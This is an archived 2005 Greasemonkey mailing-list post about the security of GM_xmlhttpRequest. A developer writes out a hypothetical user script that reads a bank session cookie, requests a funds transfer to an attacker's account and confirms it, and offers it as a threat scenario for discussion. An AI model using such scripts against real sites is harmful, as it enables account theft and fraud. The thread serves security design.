Fwd: [Greasemonkey] GM is great, but Security questions - yet again

Aaron Boodman zboogs at gmail.com
Tue Apr 5 12:23:35 EDT 2005


Ugh. Forgot to actually CC alex. I think that typing it into the text
of the message ought to be enough :).

---------- Forwarded message ----------
From: Aaron Boodman <zboogs at gmail.com>
Date: Apr 1, 2005 2:47 PM
Subject: Re: [Greasemonkey] GM is great, but Security questions - yet again
To: greasemonkey at mozdev.org


[cc'ing my friend alex, who is really smart about this stuff]

Since nobody is being specific about scenarios, I guess I will volunteer one:

@include *citibank.com/*

var sessionid = document.cookie.match(/SESSION=(\d+)/)[0];

GM_xmlhttpRequest({
  method:"get",
  url:"transferRequest.cgi?to=evilbob&acct=33423212039482",
  onload:function(details) {
    confirmTransfer(details.responseText);
  }
});

function confirmTransfer(confirmPageText) {
  var amount = confirmPageText.match(/balance: $(\d+)/)[0];
  GM_xmlhttpRequest({
    method:"get",
    url:"confirmTransfer.cgi?amount=" + amount,
    onload:function(details) {
      alert("Thanks for your money, chump!");
    }
});

What do you think, Alex. Is this a valid scenario? Is this the ability
to parse the response a significant improvement over before? Will a
community rating system combined with what I describe here:

http://greaseblog.blogspot.com/2005/03/and-now-for-something-less-snarky.html

Lets be specific.

--
Aaron

On Apr 1, 2005 1:15 PM, Edward Lee <edilee at gmail.com> wrote:
> On Apr 1, 2005 2:04 PM, Jeremy Dunck <jdunck at gmail.com> wrote:
> > Actually, any page can do that using IFrame and form post.  There's
> > nothing new about cross-domain requests.  GM_xmlhttpRequest just makes
> > it more convenient.   An evil person would not be stopped by the
> > IFrame speedbump.
>
> Well, if you're talking about something I did before with IFrames and
> POST requests.. the communication is still just 1 way. I suppose you
> could still do "evil" things relating to sending information, but a
> script cannot access the contents of the IFrame if it's in another
> domain. XMLHttpRequests returns a responseText/XML which can be
> analyzed, parsed, executed, etc.
>
> Kinda sounds like an idea I had earlier ;) Dynamic user.js files based
> on user input/login that use GM_xmlhttpRequests to get more
> information from the server for more dynamic scripting. Hrmm.. even
> more interesting is that the remote dynamic script returned from the
> xmlrequest could have the user script make more GM_xmlhttpRequests.
>
> --
> Ed
> _______________________________________________
> Greasemonkey mailing list
> Greasemonkey at mozdev.org
> http://mozdev.org/mailman/listinfo/greasemonkey
>


More information about the Greasemonkey mailing list